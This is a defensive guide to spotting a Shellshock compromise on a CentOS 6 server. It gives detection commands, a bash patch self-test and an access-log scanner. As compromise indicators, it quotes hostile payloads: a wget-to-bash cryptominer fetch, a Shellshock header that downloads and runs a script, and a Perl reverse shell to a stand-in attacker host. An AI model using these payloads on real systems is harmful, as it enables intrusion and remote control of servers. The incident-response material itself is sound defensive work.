To determine if your CentOS 6 server has been compromised via Shellshock, check these indicators:
# Check for suspicious processes
ps aux | grep -E '(wget|curl|bash|sh|\.\/)' | grep -v grep
# Examine command history of all users (run as root and read the files directly, so
# accounts with a nologin shell are covered; a .bash_history that is empty or a symlink
# to /dev/null is itself worth noting)
for h in $(cut -d: -f6 /etc/passwd | sort -u); do [ -e "$h/.bash_history" ] && { echo "==== $h ===="; ls -la "$h/.bash_history"; cat "$h/.bash_history"; }; done
# Look for unexpected cron jobs
crontab -l
ls -la /etc/cron*
Attackers often target these locations:
# Common malware locations
/tmp/
/var/tmp/
/dev/shm/
/usr/bin/
/usr/sbin/
/home/*/public_html/
/var/www/
Malicious files often have these characteristics:
# Find files with suspicious permissions (setuid or setgid)
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -la {} \;
# Check for recently modified binaries
find /bin /usr/bin /sbin /usr/sbin -type f -mtime -7 -exec ls -la {} \;
# Look for hidden files in web directories
find /var/www/ -name ".*" -type f -exec ls -la {} \;
Watch for these common malicious code patterns:
# Backdoor example (often found in .htaccess)
# (as written, these rules return 403 Forbidden to any client whose User-Agent contains wget or curl)
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^.*(wget|curl).* [NC]
RewriteRule .* - [F,L]
</IfModule>
# Cryptominer payload example
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin
wget -q -O - http://malicious.site/xmrig | bash > /dev/null 2>&1 &
If you find evidence of compromise:
# Isolate the server (from the console: this also cuts your own SSH session; -I puts the
# rules ahead of any existing ACCEPT rules, unlike -A, and OUTPUT stops further beaconing)
iptables -I INPUT -j DROP
iptables -I OUTPUT -j DROP
# Capture forensic evidence
mkdir /root/forensics
lsof -nPi > /root/forensics/open_ports.txt
netstat -tulnp > /root/forensics/netstat.txt
ps aux > /root/forensics/processes.txt
# Update and patch immediately
yum clean all
yum update bash
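The yum update only helps if the new bash is actually installed and loaded, so verify it afterwards. As an added self-check that is not part of the answer above, this POSIX sh script runs the two public Shellshock test cases (CVE-2014-6271 and the follow-up CVE-2014-7169) against the installed bash and prints the package build. The function names are this example's own; rpm is used only where it exists, and the 7169 test runs in a scratch directory because a vulnerable bash writes a file named "echo" into the current directory.

```shell
#!/bin/sh
# Added example: verify that the installed bash no longer has Shellshock after
# "yum update bash". Function names are this example's own.

# CVE-2014-6271: a vulnerable bash executes the command that trails the
# exported function definition while it starts up, so "vulnerable" is printed
# before the real command runs. Prints one of: vulnerable, patched, no-bash.
shellshock_6271_status() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case $out in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# CVE-2014-7169 (the first fix was incomplete): an unpatched bash mis-parses the
# truncated definition as a redirection and writes the output of "date" to a
# file named "echo" in the current directory. Run in a scratch directory so a
# vulnerable host does not litter the filesystem.
shellshock_7169_status() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    d=$(mktemp -d) || return 1
    (cd "$d" && env X='() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1)
    if [ -e "$d/echo" ]; then echo vulnerable; else echo patched; fi
    rm -rf "$d"
}

# Installed bash build, plus the changelog entries naming the Shellshock CVEs on
# an RPM-based system; falls back to bash's own version banner elsewhere.
bash_package_info() {
    if command -v rpm >/dev/null 2>&1; then
        rpm -q bash
        rpm -q --changelog bash | grep -E 'CVE-2014-(6271|7169)' | head -n 3
    else
        bash --version 2>/dev/null | head -n 1
    fi
}

printf 'CVE-2014-6271: %s\n' "$(shellshock_6271_status)"
printf 'CVE-2014-7169: %s\n' "$(shellshock_7169_status)"
bash_package_info
```

Both status functions print "patched" on a fixed host. Note that the tests exercise only the bash binary on the path; a long-running daemon that forked an old bash before the update still needs restarting, and services under mod_cgi or php-fpm that spawn /bin/sh will pick up the new binary only on their next exec.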
Here are key indicators that your CentOS 6 server with a LEMP stack might have been exploited through Shellshock:
# Check for unexpected processes
ps aux | grep -E 'wget|curl|bash|sh|\.sh' | grep -v grep
# Look for unusual network connections
netstat -tulnp
lsof -i
# Examine cron jobs for suspicious entries
crontab -l
ls -la /etc/cron*
Focus your search on these directories where attackers commonly place backdoors:
/tmp/
/var/tmp/
/dev/shm/
/etc/cron.hourly/
/etc/cron.daily/
/root/.ssh/
/home/*/.ssh/
/usr/lib/cgi-bin/
/var/www/*/cgi-bin/
/usr/local/bin/
Typical characteristics of Shellshock-related malware:
- Files with random alphanumeric names (e.g., x84h2k9, tmp.2387)
- Scripts containing base64-encoded blobs
- Files with recent timestamps during suspicious periods
- World-writable scripts in web-accessible directories
Use these commands to detect potential compromises:
# Find recently modified files (last 3 days)
find / -type f -mtime -3 -ls | grep -vE '\/proc\/|\/sys\/'
# Locate world-writable scripts (the -name tests must be grouped, otherwise -o breaks the match)
find / -type f -perm -o=w \( -name "*.sh" -o -name "*.pl" -o -name "*.py" \)
# Search for files containing common malicious patterns (-I skips binaries, -l lists only
# file names, and /proc, /sys and /dev are excluded so grep does not hang on them)
grep -rIlE 'wget.*https?:|curl.*https?:|bash -i' / --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev 2>/dev/null
Here's what to look for in suspicious files:
# Typical backdoor example
() { :;}; /bin/bash -c 'wget http://malicious.site/x.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x'
# IRC bot connection attempt
() { :;}; /usr/bin/perl -e 'use Socket;$i="attacker.ip";$p=6667;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
If you find evidence of compromise:
- Immediately isolate the server from the network
- Preserve logs (/var/log/) for forensic analysis
- Reinstall the OS rather than trying to clean the system
- Audit all SSH keys and passwords
- Upgrade bash to the latest patched version
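The payloads shown in this answer arrive through HTTP headers, so the web server's access log is usually the first place they are visible. As an added example that is not part of the answer above, the following POSIX sh script scans a combined-format access log (nginx or Apache) for the function-definition prefix that triggers Shellshock, both raw ("() {") and percent-encoded in a query string, and reports the matching lines and distinct source addresses. The log lines, the client IPs and the host evil.example are constructed for this example, and the function names are its own.

```shell
#!/bin/sh
# Added example: find Shellshock probes in a combined-format access log
# (nginx or Apache). The log lines, IPs and the host evil.example below are
# constructed for this example.

# The function-definition prefix that triggers CVE-2014-6271, as it shows up
# in the User-Agent, Referer or request fields: raw ("() {", "(){", "() { ")
# or percent-encoded in a query string ("%28%29%20%7B"). In grep -E, "\(",
# "\)" and "\{" are literal characters.
SHELLSHOCK_RE='\(\)[[:space:]]*\{|%28%29(%20)*%7[bB]'

# Constructed sample log: three probes from two addresses, two benign lines.
SAMPLE_LOG=$(mktemp) || exit 1
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.7 - - [25/Sep/2014:04:12:01 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://evil.example/x.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x'"
198.51.100.23 - - [25/Sep/2014:04:12:09 +0000] "GET /index.php HTTP/1.1" 200 7133 "http://www.example.com/" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [25/Sep/2014:04:13:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 168 "() { :; }; /usr/bin/perl -e 'print 1'" "Mozilla/5.0"
192.0.2.9 - - [25/Sep/2014:05:01:22 +0000] "GET /cgi-bin/hello.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 500 0 "-" "curl/7.19.7"
10.0.0.5 - - [25/Sep/2014:05:02:00 +0000] "GET /robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
EOF

# Every matching line, prefixed with the client address so hits can be
# correlated with netstat/lsof output and firewall logs.
scan_shellshock_log() {
    grep -E "$SHELLSHOCK_RE" "$1" | while IFS= read -r line; do
        printf '%s\t%s\n' "${line%% *}" "$line"
    done
}

# Hit count (prints 0 when nothing matched; grep's exit status is swallowed on purpose).
count_shellshock_hits() {
    grep -cE "$SHELLSHOCK_RE" "$1" || true
}

# Distinct source addresses, for blocking and for pivoting into other logs.
shellshock_sources() {
    grep -E "$SHELLSHOCK_RE" "$1" | cut -d' ' -f1 | sort -u
}

scan_shellshock_log "$SAMPLE_LOG"
printf 'hits: %s\n' "$(count_shellshock_hits "$SAMPLE_LOG")"
shellshock_sources "$SAMPLE_LOG"
```

Point the functions at /var/log/nginx/access.log or /var/log/httpd/access_log (and their rotated copies) instead of the sample file. A 404 or 500 on a cgi-bin path next to a hit does not mean the attempt failed: with mod_cgi or an nginx-to-fcgiwrap setup, bash runs before the script produces any status, so every matching line should be treated as a possible execution and cross-checked against the process, cron and /tmp findings above.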